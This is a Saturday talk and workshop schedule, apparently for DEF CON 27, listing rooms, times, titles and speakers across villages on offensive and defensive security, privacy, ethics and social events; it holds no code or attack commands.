Talk/Event Schedule


Saturday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Saturday - 06:00


Return to Index  -  Locations Legend
Meetups - Paris - Outside at base of Eiffel Tower - DEFCON 27 4X5K run -

 

Saturday - 09:00


BCV - Flamingo 3rd Floor - Laughlin III Room - (09:50-09:59) - Welcome Note
BTVW - Flamingo - 3rd Floor- Savoy Room - Introduction To Mac-centric Incident Response Tools And Techniques - crlowell
PHVW - Bally's - Indigo Tower - 26th Floor - Burp Suite Workshop - Sunny Wear, Nestor Torres
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - SiestaTime, A Red Team Automation Tool for Generation of Long-term Implants and Infrastructure Deployment - Alvaro Folgado

 

Saturday - 10:00


AVV - Bally's Event Center - Panel – The Long Haul: The State of Aviation Security Policy - Andrea, Stefan, Pete, Renderman
BCV - Flamingo 3rd Floor - Laughlin III Room - Keynote Blockchain-Security Symbiosis: Security Enabling Blockchains; Blockchains Enabling Security - Paul Makowski
BCV - Flamingo 3rd Floor - Laughlin III Room - (10:50-11:10) - Contest Announcement
BHV - Planet Hollywood - Melrose 1-3 Rooms - Opening Words - Sam Buhrow
BHV - Planet Hollywood - Melrose 1-3 Rooms - (10:15-10:59) - Spectra - Jean Rintoul
BTVW - Flamingo - 3rd Floor- Savoy Room - cont...(09:00-12:59) - Introduction To Mac-centric Incident Response Tools And Techniques - crlowell
CLV - Flamingo 3rd Floor - Reno I Room - Build to Hack, Hack to Build - Chris Le Roy
CLV - Flamingo 3rd Floor - Reno I Room - (10:40-11:20) - Applying Pareto's Principle for Securing AWS with SCPs - Ayman Elsawah
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Towards Usable Dining Cryptographer Networks with Howl - Tyler Kell
DC - Paris - Track 1 - Weaponizing Hypervisors to Fight and Beat Car and Medical Devices Attacks - Ali Islam, Dan Regalado (DanuX)
DC - Paris - Track 2 - Rise of the Hypebots: Scripting Streetwear - finalphoenix
DC - Paris - Track 3 - Information Security in the Public Interest - Bruce Schneier
DC - Paris - Track 4 - EDR Is Coming; Hide Yo Sh!t - Michael Leibowitz, Topher Timzen
DL - Planet Hollywood - Sunset 1 - WiFi Kraken – Scalable Wireless Monitoring - Mike Spicer
DL - Planet Hollywood - Sunset 2 - CIRCO: Cisco Implant Raspberry Controlled Operations - Emilio Couto
DL - Planet Hollywood - Sunset 3 - Cotopaxi: IoT Protocols Security Testing Toolkit - Jakub Botwicz
DL - Planet Hollywood - Sunset 4 - Srujan: Safer Networks for Smart Homes - Sanket Karpe, Parmanand Mishra
DL - Planet Hollywood - Sunset 5 - Go Reverse Engineering Tool Kit - Joakim Kennedy
DL - Planet Hollywood - Sunset 6 - Memhunter - Automated hunting of memory resident malware at scale - Marcos Oviedo
ETV - Flamingo - 3rd Floor - Reno II Room - Void If Removed: Securing Our Right To Repair -
PHVT - Bally's - Indigo Tower - 26th Floor - Hacking Corporate Org Socialization: One Day You Are Out and the Next Day You Pwn the Org! - D9
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(09:00-10:59) - Burp Suite Workshop - Sunny Wear, Nestor Torres
RCV - Planet Hollywood - Celebrity 5 Ballroom - Hack to Basics – Adapting Exploit Frameworks to Evade Microsoft ATP - Anthony “C01И” Rose and Jake “Hubble” Krasnov
RCV - Planet Hollywood - Celebrity 5 Ballroom - (10:50-11:30) - DECEPTICON: OPSEC to Slow the OSINT - Joe Gray
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - (10:30-11:30) - Breaking NBAD and UEBA Detection - Charles Herring
WS - Flamingo - Lower Level - Lake Mead I - Mind the Gap Between Attacking Windows and Mac: Breaking In and Out of Protected MacOS environments - Richard Gold
WS - Flamingo - Lower Level - Lake Mead II - Writing custom backdoor payloads using C# - Mauricio Velazco, Olindo Verrillo
WS - Flamingo - Lower Level - Valley of Fire I - Red Teaming Techniques for Electronic Physical Security Systems - Valerie Thomas, Terry Gold
WS - Flamingo - Lower Level - Valley of Fire II - Functional Programming for the Blue Team - eigentourist

 

Saturday - 11:00


AVV - Bally's Event Center - A hackers first solo: airplane avionics security 101 - Ken, Alex
BCV - Flamingo 3rd Floor - Laughlin III Room - cont...(10:50-11:10) - Contest Announcement
BCV - Flamingo 3rd Floor - Laughlin III Room - FumbleChain: A Purposefully Vulnerable Blockchain - Nils Amiet
BCV - Flamingo 3rd Floor - Laughlin III Room - (11:35-11:59) - Securing the Unknown: A Methodology for Auditing Smart Contracts - Ben
BHV - Planet Hollywood - Melrose 1-3 Rooms - DIY Medicine - Alex Pearlman
BHV - Planet Hollywood - Melrose 1-3 Rooms - (11:45-12:30) - Forensic Science and Information Security - Najla Lindsay
BTVW - Flamingo - 3rd Floor- Savoy Room - cont...(09:00-12:59) - Introduction To Mac-centric Incident Response Tools And Techniques - crlowell
CLV - Flamingo 3rd Floor - Reno I Room - cont...(10:40-11:20) - Applying Pareto's Principle for Securing AWS with SCPs - Ayman Elsawah
CLV - Flamingo 3rd Floor - Reno I Room - (11:20-11:45) - Lightning Talk (TBA)
CLV - Flamingo 3rd Floor - Reno I Room - (11:45-12:15) - PacBot - Policy as Code from T-Mobile OSS - Setu Parimi
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - TLS decryption attacks and back-doors to secure systems - Chris Hanlon
DC - Paris - Track 1 - Your Car is My Car - Jmaxxz
DC - Paris - Track 2 - HAKC THE POLICE - Bill Swearingen
DC - Paris - Track 3 - Hacking Your Thoughts - Batman Forever meets Black Mirror - Katherine Pratt/GattaKat
DC - Paris - Track 4 - Meticulously Modern Mobile Manipulations - Leon Jacobs
DL - Planet Hollywood - Sunset 1 - cont...(10:00 - 11:50) - WiFi Kraken – Scalable Wireless Monitoring - Mike Spicer
DL - Planet Hollywood - Sunset 2 - cont...(10:00 - 11:50) - CIRCO: Cisco Implant Raspberry Controlled Operations - Emilio Couto
DL - Planet Hollywood - Sunset 3 - cont...(10:00 - 11:50) - Cotopaxi: IoT Protocols Security Testing Toolkit - Jakub Botwicz
DL - Planet Hollywood - Sunset 4 - cont...(10:00 - 11:50) - Srujan: Safer Networks for Smart Homes - Sanket Karpe, Parmanand Mishra
DL - Planet Hollywood - Sunset 5 - cont...(10:00 - 11:50) - Go Reverse Engineering Tool Kit - Joakim Kennedy
DL - Planet Hollywood - Sunset 6 - cont...(10:00 - 11:50) - Memhunter - Automated hunting of memory resident malware at scale - Marcos Oviedo
LBV - Flamingo - Carson City II Room - Lock Bypass 101
Meetups - Planet Hollywood - Mezzanine Stage - dstruction -
PHVT - Bally's - Indigo Tower - 26th Floor - Solving Crimes with Wireless GeoFencing and Multi-Zone Correlation Analytics - Gleb Esman
PHVW - Bally's - Indigo Tower - 26th Floor - (11:20-13:20) - Tools? We Don’t Need No Stinkin’ Tools: Hands-on Hacking with Python - Jason Nickola, Wayne Marsh
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(10:50-11:30) - DECEPTICON: OPSEC to Slow the OSINT - Joe Gray
RCV - Planet Hollywood - Celebrity 5 Ballroom - (11:30-11:55) - Finding the needle in the twitter haystack. - Wicked Clown
RCV - Planet Hollywood - Celebrity 5 Ballroom - (11:55-12:30) - Use Responsibly: Recon Like an insider threat for Best User Training ROI - Kala Kinyon
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - cont...(10:30-11:30) - Breaking NBAD and UEBA Detection - Charles Herring
WS - Flamingo - Lower Level - Lake Mead I - cont...(10:00-13:59) - Mind the Gap Between Attacking Windows and Mac: Breaking In and Out of Protected MacOS environments - Richard Gold
WS - Flamingo - Lower Level - Lake Mead II - cont...(10:00-13:59) - Writing custom backdoor payloads using C# - Mauricio Velazco, Olindo Verrillo
WS - Flamingo - Lower Level - Valley of Fire I - cont...(10:00-13:59) - Red Teaming Techniques for Electronic Physical Security Systems - Valerie Thomas, Terry Gold
WS - Flamingo - Lower Level - Valley of Fire II - cont...(10:00-13:59) - Functional Programming for the Blue Team - eigentourist

 

Saturday - 12:00


BCV - Flamingo 3rd Floor - Laughlin III Room - Secrets Worlds in Plain Web. The BlockChain DNS. - Fernando Amatte
BCV - Flamingo 3rd Floor - Laughlin III Room - (12:50-13:40) - Jump-Oriented Programming (JOP) in Smart Contract Honeypots - Xiaohang Yu
BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(11:45-12:30) - Forensic Science and Information Security - Najla Lindsay
BHV - Planet Hollywood - Melrose 1-3 Rooms - (12:30-14:30) - Dr/Hacker Panel - Najla Lindsay
BTVW - Flamingo - 3rd Floor- Savoy Room - cont...(09:00-12:59) - Introduction To Mac-centric Incident Response Tools And Techniques - crlowell
CLV - Flamingo 3rd Floor - Reno I Room - cont...(11:45-12:15) - PacBot - Policy as Code from T-Mobile OSS - Setu Parimi
CLV - Flamingo 3rd Floor - Reno I Room - (12:15-12:59) - Hacking into automotive clouds - Rotem Bar
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Stop right now! Quantum-Safe Instantaneous Vehicle to Vehicle communication - Sarah McCarthy
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Scrubber: An open source compilation to protect journalistic sources - Ethan Gregory Dodge
DC - Paris - Track 1 - How You Can Buy AT&T, T-Mobile, and Sprint Real-Time Location Data on the Black Market - Joseph Cox
DC - Paris - Track 2 - Defeating Bluetooth Low Energy 5 PRNG for Fun and Jamming - Damien Cauquil (virtualabs)
DC - Paris - Track 3 - Why You Should Fear Your “mundane” Office Equipment - Daniel Romero, Mario Rivas
DC - Paris - Track 4 - Zombie Ant Farm: Practical Tips for Playing Hide and Seek with Linux EDRs - Dimitry Snezhkov
DL - Planet Hollywood - Sunset 1 - Burp Plugin: Cyber Security Transformation Chef (CSTC) - Ralf Almon, Sebastian Puttkammer
DL - Planet Hollywood - Sunset 2 - ioc2rpz - Vadim Pavlov
DL - Planet Hollywood - Sunset 3 - Local Sheriff - Konark Modi
DL - Planet Hollywood - Sunset 4 - PCILeech and MemProcFS - Ulf Frisk, Ian Vitek
DL - Planet Hollywood - Sunset 5 - Dr.ROBOT: Organized Chaos and the Shotgun Approach - Aleksandar Straumann, Jayson Grace
DL - Planet Hollywood - Sunset 6 - bedr - Mark Ignacio
ETV - Flamingo - 3rd Floor - Reno II Room - Is It Ethical To Work On Autonomous Weapon Systems? -
ICS - Bally's Event Center - Hack the World & Galaxy with OSINT - Chris Kubecka
ICS - Bally's Event Center - (12:30-12:59) - SCADA: What the next Stuxnet will look like and how to prevent it - Joseph Bingham
Meetups - Planet Hollywood - Mezzanine Stage - cont...(11:00-12:59) - dstruction -
Meetups - Planet Hollywood - Santa Monica 4 Room - Friends of Bill W. -
PHVT - Bally's - Indigo Tower - 26th Floor - "First-Try" DNS Cache Poisoning with IPv4 and IPv6 Fragmentation - Travis Palmer and Brian Somers
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(11:20-13:20) - Tools? We Don’t Need No Stinkin’ Tools: Hands-on Hacking with Python - Jason Nickola, Wayne Marsh
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(11:55-12:30) - Use Responsibly: Recon Like an insider threat for Best User Training ROI - Kala Kinyon
RCV - Planet Hollywood - Celebrity 5 Ballroom - (12:30-13:05) - “Can you add a conference line, please?” - Using Cloud Services for Dial-In Reconnaissance Automation - Alina Dorina
WS - Flamingo - Lower Level - Lake Mead I - cont...(10:00-13:59) - Mind the Gap Between Attacking Windows and Mac: Breaking In and Out of Protected MacOS environments - Richard Gold
WS - Flamingo - Lower Level - Lake Mead II - cont...(10:00-13:59) - Writing custom backdoor payloads using C# - Mauricio Velazco, Olindo Verrillo
WS - Flamingo - Lower Level - Valley of Fire I - cont...(10:00-13:59) - Red Teaming Techniques for Electronic Physical Security Systems - Valerie Thomas, Terry Gold
WS - Flamingo - Lower Level - Valley of Fire II - cont...(10:00-13:59) - Functional Programming for the Blue Team - eigentourist

 

Saturday - 13:00


BCV - Flamingo 3rd Floor - Laughlin III Room - cont...(12:50-13:40) - Jump-Oriented Programming (JOP) in Smart Contract Honeypots - Xiaohang Yu
BCV - Flamingo 3rd Floor - Laughlin III Room - (13:40-14:05) - Low-Hanging Fruits in Blockchain Security - Pavlo Radchuk & Serhii Okhrimenko
BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(12:30-14:30) - Dr/Hacker Panel - Najla Lindsay
BTVT - Flamingo - 3rd Floor- Savoy Room - Security Strategy for Small-Medium Business
CLV - Flamingo 3rd Floor - Reno I Room - DIY Azure Security Assessment - Tanya Janca & Teri Radichel
CLV - Flamingo 3rd Floor - Reno I Room - (13:45-14:25) - Using Splunk for Auditing AWS/GCP/Azure Security posture - Rod Soto
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Tiplines Today - Harlo Holmes
DC - Paris - Track 1 - RACE - Minimal Rights and ACE for Active Directory Dominance - Nikhil Mittal
DC - Paris - Track 2 - GSM: We Can Hear Everyone Now! - Campbell Murray, Eoin Buckley, James Kulikowski
DC - Paris - Track 3 - Tag-side attacks against NFC - Christopher Wade
DC - Paris - Track 4 - SSO Wars: The Token Menace - Alvaro Muñoz, Oleksandr Mirosh
DL - Planet Hollywood - Sunset 1 - cont...(12:00 - 13:50) - Burp Plugin: Cyber Security Transformation Chef (CSTC) - Ralf Almon, Sebastian Puttkammer
DL - Planet Hollywood - Sunset 2 - cont...(12:00 - 13:50) - ioc2rpz - Vadim Pavlov
DL - Planet Hollywood - Sunset 3 - cont...(12:00 - 13:50) - Local Sheriff - Konark Modi
DL - Planet Hollywood - Sunset 4 - cont...(12:00 - 13:50) - PCILeech and MemProcFS - Ulf Frisk, Ian Vitek
DL - Planet Hollywood - Sunset 5 - cont...(12:00 - 13:50) - Dr.ROBOT: Organized Chaos and the Shotgun Approach - Aleksandar Straumann, Jayson Grace
DL - Planet Hollywood - Sunset 6 - cont...(12:00 - 13:50) - bedr - Mark Ignacio
ICS - Bally's Event Center - HVACking: Understand the difference Between Security and Reality! - Douglas McKee, Mark Bereza
ICS - Bally's Event Center - (13:30-13:59) - CRASHOVERRIDE: Re-Assessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack - Joe Slowik
Meetups - Bally's - Chillout room near Vendor Area - DEFCON Sticker Swap -
Meetups - Planet Hollywood - Mezzanine Stage - Beard and Mustache Contest
PHVT - Bally's - Indigo Tower - 26th Floor - Phishing Freakonomics - Russell Butturini
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(11:20-13:20) - Tools? We Don’t Need No Stinkin’ Tools: Hands-on Hacking with Python - Jason Nickola, Wayne Marsh
PHVW - Bally's - Indigo Tower - 26th Floor - (13:40-15:40) - Writing Wireshark Plugins for Security Analysis - Nishant Sharma, Jeswin Mathai
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(12:30-13:05) - “Can you add a conference line, please?” - Using Cloud Services for Dial-In Reconnaissance Automation - Alina Dorina
RCV - Planet Hollywood - Celebrity 5 Ballroom - Manhunting 101 - OSINT Crash Course vs Human Targets - Jason Edison
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - BadSalt (Adversarial DevOps) - Casey Erdmann
WS - Flamingo - Lower Level - Lake Mead I - cont...(10:00-13:59) - Mind the Gap Between Attacking Windows and Mac: Breaking In and Out of Protected MacOS environments - Richard Gold
WS - Flamingo - Lower Level - Lake Mead II - cont...(10:00-13:59) - Writing custom backdoor payloads using C# - Mauricio Velazco, Olindo Verrillo
WS - Flamingo - Lower Level - Valley of Fire I - cont...(10:00-13:59) - Red Teaming Techniques for Electronic Physical Security Systems - Valerie Thomas, Terry Gold
WS - Flamingo - Lower Level - Valley of Fire II - cont...(10:00-13:59) - Functional Programming for the Blue Team - eigentourist

 

Saturday - 14:00


BCV - Flamingo 3rd Floor - Laughlin III Room - cont...(13:40-14:05) - Low-Hanging Fruits in Blockchain Security - Pavlo Radchuk & Serhii Okhrimenko
BCV - Flamingo 3rd Floor - Laughlin III Room - (14:15-15:59) - Take back control of user data with the decentralized cloud - Kevin Leffew
BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(12:30-14:30) - Dr/Hacker Panel - Najla Lindsay
BHV - Planet Hollywood - Melrose 1-3 Rooms - (14:30-15:15) - The L33T Shall Inherit the Cosmos - J.J. Hastings
BTVT - Flamingo - 3rd Floor- Savoy Room - Anatomy Of A Megabreach: Equifax Report - uncl3dumby
CLV - Flamingo 3rd Floor - Reno I Room - cont...(13:45-14:25) - Using Splunk for Auditing AWS/GCP/Azure Security posture - Rod Soto
CLV - Flamingo 3rd Floor - Reno I Room - (14:25-15:05) - Scaling Security in the Cloud With Open Source - James Strassburg
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Adversarial Fashion – Sartorial Hacking to Combat Surveillance - Kate Rose
DC - Paris - Track 1 - SELECT code_execution FROM * USING SQLite;—Gaining code execution using a malicious SQLite database - Omer Gull
DC - Paris - Track 2 - I'm on your phone, listening - Attacking VoIP Configuration Interfaces - Stephan Huber, Philipp Roskosch
DC - Paris - Track 3 - Zero bugs found? Hold my Beer AFL! How To Improve Coverage-Guided Fuzzing and Find New 0days in Tough Targets - Maksim Shudrak
DC - Paris - Track 4 - Next Generation Process Emulation with Binee - Kyle Gwinnup, John Holowczak
DL - Planet Hollywood - Sunset 1 - Burpsuite Team Server for Collaborative Web App Testing - Tanner Barnes
DL - Planet Hollywood - Sunset 2 - OWASP Amass - Jeff Foley, Anthony Rhodes
DL - Planet Hollywood - Sunset 3 - PivotSuite: Hack The Hidden Network - A Network Pivoting Toolkit - Manish Gupta
DL - Planet Hollywood - Sunset 4 - SILENTTRINITY - Marcello Salvati
DL - Planet Hollywood - Sunset 5 - Shellcode Compiler - Ionut Popescu
DL - Planet Hollywood - Sunset 6 - Shadow Workers: Backdooring with Service Workers - Emmanuel Law, Claudio Contin
ETV - Flamingo - 3rd Floor - Reno II Room - Ethical Issues In Cyber Attribution -
ICS - Bally's Event Center - Abusing the IoT in Smart Buildings - Daniel dos Santos
Meetups - Bally's - Chillout room near Vendor Area - cont...(13:00-14:59) - DEFCON Sticker Swap -
Meetups - Planet Hollywood - Mezzanine Stage - cont...(13:00-14:59) - Beard and Mustache Contest
PHVT - Bally's - Indigo Tower - 26th Floor - (14:30-14:59) - Security to Make the CFO Happy - Adam
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(13:40-15:40) - Writing Wireshark Plugins for Security Analysis - Nishant Sharma, Jeswin Mathai
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(13:05-15:10) - Manhunting 101 - OSINT Crash Course vs Human Targets - Jason Edison
RGV - Flamingo - 3rd Floor - Carson City II - A Life of Advantage Play - R.X. Gambler
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - (14:30-15:30) - Red Team Framework (RTF) - Joe Gray
WS - Flamingo - Lower Level - Lake Mead I - (14:30-18:30) - scapy_dojo_v_1 - Hugo Trovao, Rushikesh D. Nandedkar
WS - Flamingo - Lower Level - Lake Mead II - (14:30-18:30) - Modern Debugging^HWarfare with WinDbg Preview - Chris Alladoum, Axel Souchet
WS - Flamingo - Lower Level - Valley of Fire I - (14:30-18:30) - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows. - Dino Covotsos
WS - Flamingo - Lower Level - Valley of Fire II - (14:30-18:30) - Pentesting ICS 102 - Alexandrine Torrents, Arnaud Soullié

 

Saturday - 15:00


BCV - Flamingo 3rd Floor - Laughlin III Room - cont...(14:15-15:59) - Take back control of user data with the decentralized cloud - Kevin Leffew
BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(14:30-15:15) - The L33T Shall Inherit the Cosmos - J.J. Hastings
BHV - Planet Hollywood - Melrose 1-3 Rooms - (15:15-15:59) - The Story of SICGRL Vulnerability - Andrea Downing
BTVT - Flamingo - 3rd Floor- Savoy Room - Memhunter - Automated Hunting Of Memory Resident Malware At Scale - marcosd4h, chgaray
CLV - Flamingo 3rd Floor - Reno I Room - cont...(14:25-15:05) - Scaling Security in the Cloud With Open Source - James Strassburg
CLV - Flamingo 3rd Floor - Reno I Room - Your Blacklist is Dead: Why the Future of Command and Control is the Cloud - Erick Galinkin
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - I am Spartacus! (And You Can Be Too!) Ensuring Privacy through Obfuscation - Mike Kiser
DC - Paris - Track 1 - Get off the Kernel if you can’t Drive - Jesse Michael, Mickey Shkatov
DC - Paris - Track 2 - Reverse-Engineering 4g Hotspots for Fun, Bugs and Net Financial Loss - g richter
DC - Paris - Track 3 - State of DNS Rebinding - Attack & Prevention Techniques and the Singularity of Origin - Gerald Doussot, Roger Meyer
DC - Paris - Track 4 - .NET Malware Threats: Internals And Reversing - Alexandre Borges
DL - Planet Hollywood - Sunset 1 - cont...(14:00 - 15:50) - Burpsuite Team Server for Collaborative Web App Testing - Tanner Barnes
DL - Planet Hollywood - Sunset 2 - cont...(14:00 - 15:50) - OWASP Amass - Jeff Foley, Anthony Rhodes
DL - Planet Hollywood - Sunset 3 - cont...(14:00 - 15:50) - PivotSuite: Hack The Hidden Network - A Network Pivoting Toolkit - Manish Gupta
DL - Planet Hollywood - Sunset 4 - cont...(14:00 - 15:50) - SILENTTRINITY - Marcello Salvati
DL - Planet Hollywood - Sunset 5 - cont...(14:00 - 15:50) - Shellcode Compiler - Ionut Popescu
DL - Planet Hollywood - Sunset 6 - cont...(14:00 - 15:50) - Shadow Workers: Backdooring with Service Workers - Emmanuel Law, Claudio Contin
LBV - Flamingo - Carson City II Room - Lock Bypass 101
Meetups - Planet Hollywood - Mezzanine Stage - Homebrew Hardware Contest -
PHVT - Bally's - Indigo Tower - 26th Floor - Generating Personalized Wordlists With NLP by Analyzing Tweets - Utku Sen
PHVT - Bally's - Indigo Tower - 26th Floor - (15:30-15:59) - Sandbox Creative Usage For Fun and Pro...Blems - Cesare Pizzi
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(13:40-15:40) - Writing Wireshark Plugins for Security Analysis - Nishant Sharma, Jeswin Mathai
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(13:05-15:10) - Manhunting 101 - OSINT Crash Course vs Human Targets - Jason Edison
RCV - Planet Hollywood - Celebrity 5 Ballroom - Derevolutionizing OS Fingerprinting: the cat and mouse game - Jaime Sanchez
RCV - Planet Hollywood - Celebrity 5 Ballroom - (15:50-16:15) - From email address to phone number - Martin Vigo
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - cont...(14:30-15:30) - Red Team Framework (RTF) - Joe Gray
SEV - Bally's Jubilee Tower - 3rd Floor - (15:30-16:20) - I PWN thee, I PWN thee not! - Jayson Street
WS - Flamingo - Lower Level - Lake Mead I - cont...(14:30-18:30) - scapy_dojo_v_1 - Hugo Trovao, Rushikesh D. Nandedkar
WS - Flamingo - Lower Level - Lake Mead II - cont...(14:30-18:30) - Modern Debugging^HWarfare with WinDbg Preview - Chris Alladoum, Axel Souchet
WS - Flamingo - Lower Level - Valley of Fire I - cont...(14:30-18:30) - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows. - Dino Covotsos
WS - Flamingo - Lower Level - Valley of Fire II - cont...(14:30-18:30) - Pentesting ICS 102 - Alexandrine Torrents, Arnaud Soullié

 

Saturday - 16:00


BCV - Flamingo 3rd Floor - Laughlin III Room - -- Workshop --
BHV - Planet Hollywood - Melrose 1-3 Rooms - Cyberbiosecurity & the "Full Stack Biotechnologist" - Steve Lewis
BHV - Planet Hollywood - Melrose 1-3 Rooms - (16:45-17:30) - Building a New Decentralized Internet, With the Nodes Implanted in Our Bodies - Nick Titus, Zac Shannon, Mixl S. Laufer
BTVT - Flamingo - 3rd Floor- Savoy Room - (16:30-16:59) - When A Plan Comes Together: Building A SOC A-Team - markaorlando
CLV - Flamingo 3rd Floor - Reno I Room - MozDef - Andrew Krug
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Stop Facebook From Buying Your Brain: Facial Recognition, DNA, and Biometric Privacy - Tiffany Li
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Easy PAKE Oven - Steve Thomas
DC - Paris - Track 1 - Reverse Engineering 17+ Cars in Less Than 10 Minutes - Brent Stone
DC - Paris - Track 1 - (16:30-16:50) - Unpacking Pkgs: A Look Inside Macos Installer Packages And Common Security Flaws - Andy Grant
DC - Paris - Track 2 - NOC NOC. Who's there? All. All who? All the things you wanted to know about the DEF CON NOC and we won't tell you about - The DEF CON NOC
DC - Paris - Track 3 - Confessions of a Nespresso Money Mule: Free Stuff & Triangulation Fraud - Nina Kollars, Kitty Hegemon
DC - Paris - Track 3 - (16:30-16:50) - Go NULL Yourself or: How I Learned to Start Worrying While Getting Fined for Others' Auto Infractions - droogie
DC - Paris - Track 4 - Vacuum Cleaning Security—Pinky and the Brain Edition - jiska, clou (Fabian Ullrich)
DC - Paris - Track 4 - (16:30-16:50) - Apache Solr Injection - Michael Stepankin
ETV - Flamingo - 3rd Floor - Reno II Room - National Collegiate Penetration Testing Competition & Ethical Challenges -
Meetups - Planet Hollywood - Mezzanine Stage - cont...(15:00-16:59) - Homebrew Hardware Contest -
PHVT - Bally's - Indigo Tower - 26th Floor - (Re)Thinking Security Given the Spectre of a Meltdown (hold my beer) - Jeff Man
PHVW - Bally's - Indigo Tower - 26th Floor - Advanced APT Hunting with Splunk - John Stoner, Ryan Kovar
RCV - Planet Hollywood - Celebrity 5 Ballroom - cont...(15:50-16:15) - From email address to phone number - Martin Vigo
RCV - Planet Hollywood - Celebrity 5 Ballroom - (16:15-16:59) - PIE - A hardware based Prebellico Intelligence Exfiltration Botnet - William Suthers
RGV - Flamingo - 3rd Floor - Carson City II - Verbal Steganography - Four Suites Co.
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Through the Looking Glass: Own the Data Center - Chris McCoy
SEV - Bally's Jubilee Tower - 3rd Floor - cont...(15:30-16:20) - I PWN thee, I PWN thee not! - Jayson Street
SEV - Bally's Jubilee Tower - 3rd Floor - (16:30-16:59) - Getting Psychic: Cold Reading Techniques for Fortune Tellers and Social Engineers - Chris Kirsch
WS - Flamingo - Lower Level - Lake Mead I - cont...(14:30-18:30) - scapy_dojo_v_1 - Hugo Trovao, Rushikesh D. Nandedkar
WS - Flamingo - Lower Level - Lake Mead II - cont...(14:30-18:30) - Modern Debugging^HWarfare with WinDbg Preview - Chris Alladoum, Axel Souchet
WS - Flamingo - Lower Level - Valley of Fire I - cont...(14:30-18:30) - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows. - Dino Covotsos
WS - Flamingo - Lower Level - Valley of Fire II - cont...(14:30-18:30) - Pentesting ICS 102 - Alexandrine Torrents, Arnaud Soullié

 

Saturday - 17:00


BCV - Flamingo 3rd Floor - Laughlin III Room - cont...(16:10-17:59) - -- Workshop --
BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(16:45-17:30) - Building a New Decentralized Internet, With the Nodes Implanted in Our Bodies - Nick Titus, Zac Shannon, Mixl S. Laufer
BHV - Planet Hollywood - Melrose 1-3 Rooms - (17:30-18:15) - Liven Up - Rachel Smith
BTVT - Flamingo - 3rd Floor- Savoy Room - Extending Zeek For ICS Defense - v4tl4, jamesdickenson
BTVT - Flamingo - 3rd Floor- Savoy Room - (17:30-17:59) - Killsuit - How The Equation Group Remained Out Of Sight For Years - connormorley, laciefan
CLV - Flamingo 3rd Floor - Reno I Room - cont...(16:00-17:59) - MozDef - Andrew Krug
CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Snoop all Telegram messages - Vitor Ventura
DC - Paris - Track 2 - cont...(16:00-17:45) - NOC NOC. Who's there? All. All who? All the things you wanted to know about the DEF CON NOC and we won't tell you about - The DEF CON NOC
Meetups - Planet Hollywood - Mezzanine Stage - Tinfoil Hat Contest -
Meetups - Planet Hollywood - Santa Monica 4 Room - Friends of Bill W. -
PHVT - Bally's - Indigo Tower - 26th Floor - State Sponsored Hacking: How to Intercept/Decrypt TLS Traffic and How to Prevent TLS Interception Attacks - Chris Hanlon
PHVW - Bally's - Indigo Tower - 26th Floor - cont...(16:00-17:59) - Advanced APT Hunting with Splunk - John Stoner, Ryan Kovar
RGV - Flamingo - 3rd Floor - Carson City II - Verbal Steganography Workshop - Four Suites Co.
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - (17:30-18:30) - Casting with the Pros: Tips and Tricks for Effective Phishing - Nathan Sweaney
SEV - Bally's Jubilee Tower - 3rd Floor - Hacking Your Career Through Social Engineering - Rabecca Long
SEV - Bally's Jubilee Tower - 3rd Floor - (17:40-18:09) - Red Teaming - DON'T MISS THIS ONE - Wayne Ronaldson
WS - Flamingo - Lower Level - Lake Mead I - cont...(14:30-18:30) - scapy_dojo_v_1 - Hugo Trovao, Rushikesh D. Nandedkar
WS - Flamingo - Lower Level - Lake Mead II - cont...(14:30-18:30) - Modern Debugging^HWarfare with WinDbg Preview - Chris Alladoum, Axel Souchet
WS - Flamingo - Lower Level - Valley of Fire I - cont...(14:30-18:30) - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows. - Dino Covotsos
WS - Flamingo - Lower Level - Valley of Fire II - cont...(14:30-18:30) - Pentesting ICS 102 - Alexandrine Torrents, Arnaud Soullié

 

Saturday - 18:00


BCV - Flamingo 3rd Floor - Laughlin III Room - Contest Roundup
BCV - Flamingo 3rd Floor - Laughlin III Room - (18:20-18:30) - Closing note
BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(17:30-18:15) - Liven Up - Rachel Smith
BHV - Planet Hollywood - Melrose 1-3 Rooms - (18:15-18:59) - Getting access to your heart's data - Marie Moe
LBV - Flamingo - Carson City II Room - The Human Body's Promise: How Your Bare Hands can Defeat Physical Security -
Night Life - Planet Hollywood - Mezzanine Stage - H@ck3r Runw@y -
